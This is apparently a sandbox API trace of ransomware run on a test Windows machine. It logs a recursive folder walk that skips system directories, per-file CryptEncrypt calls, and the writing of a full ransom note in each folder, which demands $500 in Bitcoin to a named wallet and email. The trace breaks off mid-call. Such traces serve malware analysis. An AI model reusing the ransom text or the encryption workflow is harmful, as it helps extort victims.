[0089.218] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP8_1") returned 68 [0089.218] lstrcmpW (lpString1="IMJP8_1", lpString2=".") returned 1 [0089.218] lstrcmpW (lpString1="IMJP8_1", lpString2="..") returned 1 [0089.218] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP8_1\\*") returned 70 [0089.218] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP8_1\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0089.219] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.219] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.219] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.219] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.219] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.219] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP8_1\\.") returned 70 [0089.219] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.219] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.219] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.219] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.219] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.219] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.219] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.219] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP8_1\\..") returned 71 [0089.219] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.219] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.219] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0089.219] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0089.219] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP8_1\\RESTORE_FILES.txt") returned 86 [0089.219] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP8_1\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\imjp8_1\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0089.220] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.220] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0089.221] lstrlenA (lpString="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") returned 684 [0089.221] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0089.221] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.221] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, 
lpOverlapped=0x0) returned 1 [0089.221] CloseHandle (hObject=0xd8) returned 1 [0089.221] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0089.221] lstrcmpiW (lpString1="IMJP9_0", lpString2="Windows") returned -1 [0089.221] lstrcmpiW (lpString1="IMJP9_0", lpString2="Program Files") returned -1 [0089.221] lstrcmpiW (lpString1="IMJP9_0", lpString2="Program Files (x86)") returned -1 [0089.221] lstrcmpiW (lpString1="IMJP9_0", lpString2="$Recycle.bin") returned 1 [0089.221] lstrcmpiW (lpString1="IMJP9_0", lpString2="System Volume Information") returned -1 [0089.221] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP9_0") returned 68 [0089.221] lstrcmpW (lpString1="IMJP9_0", lpString2=".") returned 1 [0089.221] lstrcmpW (lpString1="IMJP9_0", lpString2="..") returned 1 [0089.221] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP9_0\\*") returned 70 [0089.221] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP9_0\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0089.221] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.221] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.222] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.222] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.222] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.222] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP9_0\\.") returned 70 [0089.222] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.222] FindNextFileW (in: 
hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.222] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.222] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.222] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.222] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.222] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.222] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP9_0\\..") returned 71 [0089.222] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.222] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.222] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0089.222] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0089.222] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP9_0\\RESTORE_FILES.txt") returned 86 [0089.222] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP9_0\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\imjp9_0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0089.222] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.222] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0089.223] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.223] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0089.223] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.223] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0089.223] CloseHandle (hObject=0xd8) returned 1 [0089.223] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0089.223] lstrcmpiW (lpString1="Internet Explorer", lpString2="Windows") returned -1 [0089.223] lstrcmpiW (lpString1="Internet Explorer", lpString2="Program Files") returned -1 [0089.223] lstrcmpiW (lpString1="Internet Explorer", lpString2="Program Files (x86)") returned -1 [0089.223] lstrcmpiW (lpString1="Internet Explorer", lpString2="$Recycle.bin") returned 1 [0089.223] lstrcmpiW (lpString1="Internet Explorer", 
lpString2="System Volume Information") returned -1 [0089.223] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer") returned 78 [0089.223] lstrcmpW (lpString1="Internet Explorer", lpString2=".") returned 1 [0089.223] lstrcmpW (lpString1="Internet Explorer", lpString2="..") returned 1 [0089.224] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\*") returned 80 [0089.224] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0089.224] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.224] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.224] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.224] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.224] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.224] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\.") returned 80 [0089.224] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.224] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0089.224] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0089.224] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0089.224] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0089.224] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.224] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.225] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.225] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.225] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.225] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.225] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.225] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\..") returned 81 [0089.225] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.225] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.225] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0089.225] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0089.225] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0089.225] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0089.225] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\.." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.225] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.225] lstrcmpiW (lpString1="DOMStore", lpString2="Windows") returned -1 [0089.225] lstrcmpiW (lpString1="DOMStore", lpString2="Program Files") returned -1 [0089.225] lstrcmpiW (lpString1="DOMStore", lpString2="Program Files (x86)") returned -1 [0089.225] lstrcmpiW (lpString1="DOMStore", lpString2="$Recycle.bin") returned 1 [0089.225] lstrcmpiW (lpString1="DOMStore", lpString2="System Volume Information") returned -1 [0089.225] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore") returned 87 [0089.225] lstrcmpW (lpString1="DOMStore", lpString2=".") returned 1 [0089.225] lstrcmpW (lpString1="DOMStore", lpString2="..") returned 1 [0089.225] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\*") returned 89 [0089.225] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0089.225] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.225] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.225] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.225] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.225] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.226] wnsprintfW (in: pszDest=0x4dfbb0, 
cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\.") returned 89 [0089.226] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.226] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0089.226] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0089.226] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.226] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.226] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.226] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.226] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.226] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.226] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.226] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.226] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.226] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\..") returned 90 [0089.226] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.226] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.226] StrStrIW (lpFirst="..", 
lpSrch=".protected") returned 0x0 [0089.226] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0089.226] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.226] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.226] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.226] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.226] lstrcmpiW (lpString1="36USA68T", lpString2="Windows") returned -1 [0089.226] lstrcmpiW (lpString1="36USA68T", lpString2="Program Files") returned -1 [0089.226] lstrcmpiW (lpString1="36USA68T", lpString2="Program Files (x86)") returned -1 [0089.226] lstrcmpiW (lpString1="36USA68T", lpString2="$Recycle.bin") returned 1 [0089.226] lstrcmpiW (lpString1="36USA68T", lpString2="System Volume Information") returned -1 [0089.226] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T") returned 96 [0089.226] lstrcmpW (lpString1="36USA68T", lpString2=".") returned 1 [0089.226] lstrcmpW (lpString1="36USA68T", lpString2="..") returned 1 [0089.227] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\*") returned 98 [0089.227] FindFirstFileW (in: 
lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0089.227] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.227] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.227] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.227] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.227] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.227] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\.") returned 98 [0089.227] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.227] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0089.227] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0089.227] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0089.227] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0089.227] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\36usa68t\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.227] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0089.227] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.227] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.227] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.227] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.228] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.228] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\..") returned 99 [0089.228] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.228] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.228] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0089.228] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0089.228] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0089.228] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0089.228] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\.." 
